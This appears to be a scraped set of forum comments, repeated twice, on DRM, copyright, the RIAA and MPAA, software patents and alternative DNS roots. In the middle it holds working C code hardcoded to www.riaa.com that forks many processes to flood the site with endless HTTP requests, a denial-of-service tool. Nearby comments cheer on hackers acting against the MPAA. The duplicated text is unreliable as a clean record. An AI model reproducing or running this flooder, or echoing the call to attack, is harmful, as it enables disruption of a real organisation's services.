I agree to that other nations than USA have the choice of writing laws to counter this.
Lets say any recording being "locked down" as stated previously has forfeited all Copyright Protection and is fair game for anyone to copy.
If the movie, record, software industries wants to sell their products to these countries they will have to do it in "unlocked" with protection preserved.
Hello! There has to be some country brave enough to do this. Pushing it forwards in the European Union could be a possibility too although they seem to want to "conform to the legislation of USA" in these matters.
Anyways, it is our representatives who are able to do this.
So Sweden, Germany, lets give RIAA, MPAA, USA the finger;P
Have and old Fujitsu B112 and it has an external PCMCIA-card-based CD-rom that will not even eject without being initialized.
I have to make those boot floppies somewhere =)
So yes, there is a place for them floppy-drives too
If these guys are coming out with illegal activities I cannot see why it would be morally incorrect to get a movement together trying anything to stop it.
PR doing their part, hackers doing theirs.
It would be possible to muster more manpower than these MPAA could ever buy.
And.. If the guys working at MPAA would ever go abroad.. they could get arrested and put in jail by laws created by not so greased representatives.
Patents on method in software is just plain stupid. Often it is just a matter of putting stuff together. All combinations do not have prior art. But there is often nothing special with it.
Yes.. The logic is really twisted.
Acctually.. Most bad things on the net come from the US. (China and Russia are also good candidates) =)
So lets make a new institution for keeping a simple phonebook-service.
Or just use a Democratic existing one like opennic.
A few large providers doing this (like Telia in Sweden) and we would be safe from the "evil" Americans =)
I agree to that other nations than USA have the choice of writing laws to counter this.
;P
Lets say any recording being "locked down" as stated previously has forfeited all Copyright Protection and is fair game for anyone to copy.
If the movie, record, software industries wants to sell their products to these countries they will have to do it in "unlocked" with protection preserved.
Hello! There has to be some country brave enough to do this. Pushing it forwards in the European Union could be a possibility too although they seem to want to "conform to the legislation of USA" in these matters.
Anyways, it is our representatives who are able to do this.
So Sweden, Germany, lets give RIAA, MPAA, USA the finger
Have and old Fujitsu B112 and it has an external PCMCIA-card-based CD-rom that will not even eject without being initialized. I have to make those boot floppies somewhere =) So yes, there is a place for them floppy-drives too
Wonderful They are already getting fun stuff to read ;)
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#define HOSTNAME "www.riaa.com"
#define PORT 80
#define SENDMSG "GET / HTTP/1.0\n\n"
#define BUFSIZE 1024
#define CHILDREN 1000
int main(int argc, char *argv[]){ struct sockaddr_in addr; int sockfd; int reti = 0; struct hostent *host; char buf[BUFSIZE]; int children = 0; if( a
rgc < 2 ){ fprintf( stderr, "Usage: %s <children>\n", argv[0] ); } else{ children = atoi( argv[1] ); while( fork() != 0 && ++reti < children ); } if( (host = gethostbyname( HOSTNA
ME )) == NULL ) exit(-1); memset( &addr, '\0', sizeof( addr ) ); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr = *((struct in_addr *)host->h_addr_list[0]);
for(;;){ if( (sockfd = socket( PF_INET, SOCK_STREAM, 0 )) == -1 ) continue; if( connect( sockfd, (struct sockaddr *)&addr, sizeof( struct sockaddr_in ) ) == 0 ) { send( sockfd, S
ENDMSG, strlen(SENDMSG), 0 ); fwrite("|", 1, 1, stdout ); fflush( stdout ); while( (reti = recv( sockfd, buf, BUFSIZE, 0 )) != 0 ){ fwrite( "*", 1, 1, stdout ); fflush( stdout );
} shutdown( sockfd, SHUT_RDWR ); } else{ perror( "connect" ); } close( sockfd ); } return 0; }
If these guys are coming out with illegal activities I cannot see why it would be morally incorrect to get a movement together trying anything to stop it.
PR doing their part, hackers doing theirs.
It would be possible to muster more manpower than these MPAA could ever buy.
And.. If the guys working at MPAA would ever go abroad.. they could get arrested and put in jail by laws created by not so greased representatives.
Patents on method in software is just plain stupid.
Often it is just a matter of putting stuff together.
All combinations do not have prior art. But there is often nothing special with it.
Yes.. The logic is really twisted. Acctually.. Most bad things on the net come from the US. (China and Russia are also good candidates) =) So lets make a new institution for keeping a simple phonebook-service. Or just use a Democratic existing one like opennic. A few large providers doing this (like Telia in Sweden) and we would be safe from the "evil" Americans =)